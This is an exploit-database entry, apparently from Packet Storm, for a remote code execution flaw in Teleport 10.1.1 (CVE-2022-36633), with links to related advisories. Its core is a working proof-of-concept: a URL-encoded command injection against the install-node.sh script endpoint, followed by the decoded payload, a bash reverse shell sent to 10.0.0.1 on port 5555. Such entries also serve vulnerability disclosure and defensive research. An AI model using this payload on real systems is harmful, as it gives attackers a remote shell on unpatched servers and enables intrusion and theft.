Lucene search
Brian Landrum, Brandon RoachPACKETSTORM:168477HistorySep 23, 2022 - 12:00 a.m.
Teleport 10.1.1 Remote Code Execution
2022-09-2300:00:00
Brian Landrum, Brandon Roach
packetstormsecurity.com
252
exploit
teleport
remote code execution
rce
cve-2022-36633
linux
gravitational
teleport.site.com
bash
dev/tcp
EPSS
0.031
Percentile
91.2%
`# Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE)
# Date: 08/01/2022
# Exploit Author: Brandon Roach & Brian Landrum
# Vendor Homepage: https://goteleport.com
# Software Link: https://github.com/gravitational/teleport
# Version: < 10.1.2
# Tested on: Linux
# CVE: CVE-2022-36633
Proof of Concept (payload):
https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2=
f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%3=
0%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?=
method=3Diam
Decoded payload:
"
/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #
`
Related
osv
osv
CGA-cp25-64gp-6fm3
2024-06-06 12:26:44
Improper token validation leading to code execution in Teleport
2022-08-25 00:00:28
CVE-2022-36633
2022-08-24 13:15:08
cve
cve
CVE-2022-36633
2022-08-24 13:15:08
prion
prion
Command injection
2022-08-24 13:15:00
zdt
zdt
Teleport v10.1.1 - Remote Code Execution Vulnerability
2022-09-23 00:00:00
Teleport 9.3.6 Command Injection Vulnerability
2022-08-23 00:00:00
veracode
veracode
Command Injection
2022-08-25 12:54:27
nvd
nvd
CVE-2022-36633
2022-08-24 13:15:08
github
github
Improper token validation leading to code execution in Teleport
2022-08-25 00:00:28
exploitdb
exploitdb
Teleport v10.1.1 - Remote Code Execution (RCE)
2022-09-23 00:00:00
cvelist
cvelist
CVE-2022-36633
2022-08-24 12:29:54
packetstorm
packetstorm
Teleport 9.3.6 Command Injection
2022-08-23 00:00:00
ibm
ibm